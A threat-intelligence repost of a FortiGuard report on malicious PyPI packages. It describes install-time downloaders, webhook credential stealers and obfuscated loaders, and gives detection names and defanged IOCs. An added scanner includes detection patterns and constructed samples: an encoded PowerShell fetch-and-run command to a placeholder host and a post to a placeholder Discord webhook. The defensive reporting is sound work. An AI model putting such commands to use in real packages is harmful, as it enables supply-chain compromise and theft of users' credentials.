By monitoring an open-source ecosystem, the FortiGuard Labs team recently discovered over 60 zero-day attacks embedded in PyPI packages (Python Package Index) between early February and mid-March of 2023. In this report[1], analysts cover all the packages found, grouping them into similar attacks or behaviors.
The packages in the first set were found to be similar:
- py-hydraurlstudy (version 2.37)
- tptoolpywgui (version 10.56)
- libgetrandram (version 7.78)
- esqultraultrapong (version 7.37)
- esqhackedLGTBpip (version 5.4)
- tppyrandomed (version 4.33)
- esqpepintpyw (version 3.40)
- py-proofnvidiavm (version 7.87)
- selfvisapostosint (version 1.16)
- esqhttpguicc (version 2.76)
- esqcpupipkill (version 9.35)
- py-ultrageturl (version 4.17)
- esqpeprandpaypal (version 5.38)
- esqhttppywinfo (version 8.86)
- tppyLGTBnvidia (version 3.11)
- selfpostmcintel (version 10.27)
- esqrerecandy (version 2.70)
- esqpaypalnvidiaurl (version 4.73)
- librereplacereplace (version 8.23)
- selfhackedrandomstudy (versions 4.59, 5.55)
- libvirtualsplitstring (version 2.35)
- py-infohydrarandom (version 1.57)
- esqproofpongint (version 4.27)
- selfccvirtualgame (version 6.70)
- tpintelpullcpu (version 9.31)
- selflibmineload (version 5.34)
- esqsplitpushpush (version 7.71)
- selfproofstudyrand (version 1.59)
- libcontrolverLGTB (version 5.50)
- esqgameloadrandom (version 4.81)
- selfpaypalcontrolsuper (version 5.71)
- libpipinfoad (version 10.35)
- libpywstrvm (version 7.15)
- selfhydrastudycc (version 2.15)
- tpstringcraftget (version 6.42)
- esqlibkillstr (version 10.27)
- selfrandompullver (version 1.9)
- tpreloadad (version 1.68)
- selfinturlstudy (version 2.23)
- selfosintgrandrandom (version 2.67)
Figure 1: One of the variants of setup.py of set one
The setup.py file in these packages tries to launch PowerShell with a Base64-encoded command that attempts to download a potentially malicious executable and run it. The encoded command decodes as follows:
Figure 2: Decoded PowerShell command
This next set of packages includes:
- useragentclient (version 1.0)
- etherapi (version 1.0)
- colorstyle (version 1.0)
- ligitgays (version 1.0)
- ligitkidss (version 1.0)
- tls-python (version 1.0)
- tlsproxies (version 1.0)
- xboxlivepy (version 1.0)
- syntax-init (version 1.0)
The setup.py file in these packages tries to execute a python script written to connect to a URL that may contain malicious code. The contents of the URL resolve to the code we found in set three, below.
Figure 3: One of the variants of setup.py in set two
The third set of packages includes:
- trc20-unlocker (version 1.0)
- snwproxies (version 1.0)
- thebypasstool (version 1.0)
- judyb-advanced (version 1.0)
The setup.py file in these packages tries to steal sensitive information, such as credit card details, wallets, and account logins, and sends it out through a Discord webhook.
Figure 4: Code snippet of one of the variants of setup.py in set three
While the setup.py file for the component judyb-advanced may at first appear different from the others in this set (Figure 5), after being decoded with Base64 it resolves to the code shown in Figure 4.
Figure 5: Code snippet of setup.py of judyb-advanced
This set of packages includes:
- v4pe (version 5)
- telthi (version 1)
The setup.py file in these packages includes the Empyrean stealer code, an open-source stealer used to harvest users’ sensitive information. The code in these packages is heavily obfuscated, but we were able to see several techniques, including anti-debug, autorun, and injection methods written in Python.
Figure 6: Code snippet of setup.py one of the variants in set four
This set of packages includes:
- aiotoolsbox (versions 1.4.5, 1.4.7)
- asyncio-box (version 1.4.6)
The setup.py file in these packages tries to download a zip file into a directory (chosen according to the Python version), extract its contents, run a script contained in the zip file, and then remove the directory.
Figure 7: Code snippet of one of the variants of setup.py in set five
The packages in this set include:
- pycolouring (version 0.1.5)
- colourfool (version 0.1.5)
The setup.py file in these packages tries to download a zip file containing malicious code, extract it, and run it, all while trying to hide this activity from the user.
Figure 8: Code snippets of setup.py in set six
This set includes the following package:
- gmgeoip (version 0.0.2)
Its setup.py file tries to exfiltrate user information to what looks like a webhook URL.
Figure 9: setup.py in set seven
This set includes the following package:
- httpx-advanced3 (version 0.1.0)
Its setup.py file tries to execute heavily obfuscated code. From the package metadata, which points to the GitHub link “https://github.com/Napoleon-x/multi-logger-python-discord-token-logger-and-chrome-password-stealer-through-webhooks”, analysts got a clue that it may be a password stealer that reports through a Discord webhook.
Figure 10: setup.py in set eight
This set includes the following package:
- pycrypterexe (versions 1.0.0, 1.0.1, 1.0.2, 1.0.3)
Its setup.py file tries to run a potentially malicious python script and then remove it.
Figure 11: setup.py from one of the versions of pycrypterexe
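The sets above share a handful of install-time behaviours: an encoded PowerShell launcher (set one), exec of a Base64 payload (judyb-advanced), Discord webhook exfiltration (sets three and seven), zip download and extraction (sets five and six), and deleting the dropped script afterwards (set nine). The following Python is an added defender-side check that is not code from the report or from Fortinet: it scans a setup.py for those patterns and decodes any -EncodedCommand argument as UTF-16LE, which is what PowerShell expects. The sample setup.py texts, the placeholder URL and the decoded command are constructed for this example.

```python
import base64
import re

# Static indicators for the behaviours this report describes in setup.py files:
# an encoded PowerShell launcher (set one), exec of Base64 payloads (judyb-advanced),
# Discord webhook exfiltration (sets three and seven), zip download and extraction
# (sets five and six), and deleting the dropped script afterwards (set nine).
INDICATORS = {
    "encoded_powershell": re.compile(r"powershell[^\n]*?\s-(?:e|ec|enc|encodedcommand)\b", re.I),
    "base64_exec": re.compile(r"exec\s*\(\s*(?:base64\.)?b64decode", re.I),
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/webhooks/", re.I),
    "zip_extract": re.compile(r"zipfile\.ZipFile|\.extractall\(", re.I),
    "self_cleanup": re.compile(r"os\.remove\(|shutil\.rmtree\(", re.I),
}
ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+['\"]?([A-Za-z0-9+/=]{16,})", re.I)
# Checked against the decoded PowerShell: fetch-and-run cmdlets and their aliases.
PS_DOWNLOAD_RUN = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-Process|\biex\b", re.I)


def decode_powershell_arg(blob: str) -> str:
    """-EncodedCommand carries Base64 of UTF-16LE text, so decode as such, not UTF-8."""
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def scan_setup_py(source: str) -> dict:
    """Return the indicators hit in a setup.py plus any recovered PowerShell commands."""
    hits = {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}
    decoded = [d for d in map(decode_powershell_arg, ENC_ARG.findall(source)) if d]
    hits["decoded_download_and_run"] = any(PS_DOWNLOAD_RUN.search(d) for d in decoded)
    return {"hits": [k for k, v in hits.items() if v], "decoded_powershell": decoded}


# Constructed samples (written for this example, not taken from any real package).
# The decoded command and the webhook URL are placeholders.
SAMPLE_CMD = "Invoke-WebRequest http://placeholder.invalid/a.exe -OutFile a.exe; Start-Process a.exe"
SAMPLE_SET_ONE = (
    "import os\nfrom setuptools import setup\n"
    f"os.system('powershell -w hidden -enc {base64.b64encode(SAMPLE_CMD.encode('utf-16-le')).decode()}')\n"
    "setup(name='demo', version='1.0')\n"
)
SAMPLE_SET_THREE = "import requests\nrequests.post('https://discord.com/api/webhooks/0/placeholder', json={})\n"

if __name__ == "__main__":
    for name, src in (("set one", SAMPLE_SET_ONE), ("set three", SAMPLE_SET_THREE)):
        print(name, scan_setup_py(src))
```

Run it against the setup.py of a downloaded sdist (pip download --no-binary :all: <pkg>) before installing; a hit on decoded_download_and_run or discord_webhook is a strong reason not to proceed.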
Conclusion
In this report, researchers have reviewed several sets of packages, each with a different style of attack, that we have gathered over the past month or so. The packages in each set seem to use similar methods of attack. Given the volume and variety of malicious packages we have discovered, Python end users should use caution when downloading packages and double-check them before use.
Analysts will continue monitoring new open-source packages and reporting on any malicious packages we find to help prevent users from becoming victims of a supply chain attack.
FortiGuard Anti-Virus detects the malicious files identified in this report as:
- py-hydraurlstudy-2.37 setup.py:Python/Agent.KAF!tr
- tptoolpywgui-10.56 setup.py:Python/Agent.KAF!tr
- libgetrandram-7.78 setup.py:Python/Agent.KAF!tr
- esqultraultrapong-7.37 setup.py:Python/Agent.KAF!tr
- esqhackedLGTBpip-5.4 setup.py:Python/Agent.KAF!tr
- tppyrandomed-4.33 setup.py:Python/Agent.KAF!tr
- esqpepintpyw-3.40 setup.py:Python/Agent.KAF!tr
- py-proofnvidiavm-7.87 setup.py:Python/Agent.KAF!tr
- selfvisapostosint-1.16 setup.py:Python/Agent.KAF!tr
- esqhttpguicc-2.76 setup.py:Python/Agent.KAF!tr
- esqcpupipkill-9.35 setup.py:Python/Agent.KAF!tr
- py-ultrageturl-4.17 setup.py:Python/Agent.KAF!tr
- esqpeprandpaypal-5.38 setup.py:Python/Agent.KAF!tr
- esqhttppywinfo-8.86 setup.py:Python/Agent.KAF!tr
- tppyLGTBnvidia-3.11 setup.py:Python/Agent.KAF!tr
- selfpostmcintel-10.27 setup.py:Python/Agent.KAF!tr
- esqrerecandy-2.70 setup.py:Python/Agent.KAF!tr
- esqpaypalnvidiaurl-4.73 setup.py:Python/Agent.KAF!tr
- librereplacereplace-8.23 setup.py:Python/Agent.KAF!tr
- selfhackedrandomstudy-4.59 setup.py:Python/Agent.KAF!tr
- selfhackedrandomstudy-5.55 setup.py:Python/Agent.KAF!tr
- libvirtualsplitstring-2.35 setup.py:Python/Agent.KAF!tr
- py-infohydrarandom-1.57 setup.py:Python/Agent.KAF!tr
- esqproofpongint-4.27 setup.py:Python/Agent.KAF!tr
- selfccvirtualgame-6.70 setup.py:Python/Agent.KAF!tr
- tpintelpullcpu-9.31 setup.py:Python/Agent.KAF!tr
- selflibmineload-5.34 setup.py:Python/Agent.KAF!tr
- esqsplitpushpush-7.71 setup.py:Python/Agent.KAF!tr
- selfproofstudyrand-1.59 setup.py:Python/Agent.KAF!tr
- libcontrolverLGTB-5.50 setup.py:Python/Agent.KAF!tr
- esqgameloadrandom-4.81 setup.py:Python/Agent.KAF!tr
- selfpaypalcontrolsuper-5.71 setup.py:Python/Agent.KAF!tr
- libpipinfoad-10.35 setup.py:Python/Agent.KAF!tr
- libpywstrvm-7.15 setup.py:Python/Agent.KAF!tr
- selfhydrastudycc-2.15 setup.py:Python/Agent.KAF!tr
- tpstringcraftget-6.42 setup.py:Python/Agent.KAF!tr
- esqlibkillstr-10.27 setup.py:Python/Agent.KAF!tr
- selfrandompullver-1.9 setup.py:Python/Agent.KAF!tr
- tpreloadad-1.68 setup.py:Python/Agent.KAF!tr
- selfinturlstudy-2.23 setup.py:Python/Agent.KAF!tr
- selfosintgrandrandom-2.67 setup.py:Python/Agent.KAF!tr
- colorstyle-1.0 setup.py:Python/Agent.KAF!tr
- snwproxies-1.0 setup.py:Python/Agent.KAF!tr
- thebypasstool-1.0 setup.py:Python/Agent.KAF!tr
- judyb-advanced-1.0 setup.py:Python/Agent.KAF!tr
- telthi-1 setup.py:Python/Agent.KAF!tr
- pycolouring-0.1.5 setup.py:Python/Agent.KAF!tr
- pycolouring-0.1.5 code.py:Python/Agent.KAF!tr
- colourfool-0.1.5 setup.py:Python/Agent.KAF!tr
- gmgeoip-0.0.2 setup.py:Python/Agent.KAF!tr
- httpx-advanced3-0.1.0 setup.py:Python/Agent.KAF!tr
- pycrypterexe-1.0.0 setup.py:Python/Agent.KAF!tr
- pycrypterexe-1.0.1 setup.py:Python/Agent.KAF!tr
- pycrypterexe-1.0.2 setup.py:Python/Agent.KAF!tr
- pycrypterexe-1.0.3 setup.py:Python/Agent.KAF!tr
- useragentclient-1.0 setup.py:Python/Agent.LK!tr
- etherapi-1.0 code.py:Python/Agent.LK!tr
- ligitgays-1.0 setup.py:Python/Agent.LK!tr
- ligitkidss-1.0 setup.py:Python/Agent.LK!tr
- tls-python-1.0 setup.py:Python/Agent.LK!tr
- xboxlivepy-1.0 setup.py:Python/Agent.LK!tr
- syntax-init-1.0 setup.py:Python/Agent.LK!tr
- tlsproxies-1.0 setup.py:Python/Agent.EAD2!tr.dldr
- trc20-unlocker-1.0 setup.py:Python/Agent.DC4D!tr.pws
- v4pe-5 setup.py:Python/Injector.A4FE!tr
- v4pe-5 obfuscated.js:JS/Agent.QKA!tr
IOCs
Malicious URLs
- hxxps://paste[.]bingner[.]com/paste/jr7ow/raw
- hxxps://raw[.]githubusercontent[.]com/addi00000/empyrean-injection/main/obfuscated[.]js
- hxxps://cdn[.]discordapp[.]com/attachments/1072676199073062975/1072698468956655726/Game[.]zip
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization, and we would like to thank Fortinet Labs for this great report. Fortinet has long supplied technical reports of high value to Red Sky Alliance. For questions, comments, or assistance, please get in touch with the office at 1-844-492-7225 or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www.redskyalliance.org/
- Website: https://www.wapacklabs.com/
- LinkedIn: https://www.linkedin.com/company/64265941
REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/5504229295967742989
[1] https://www.fortinet.com/blog/threat-research/supply-chain-attack-via-new-malicious-python-packages?lctg=141970831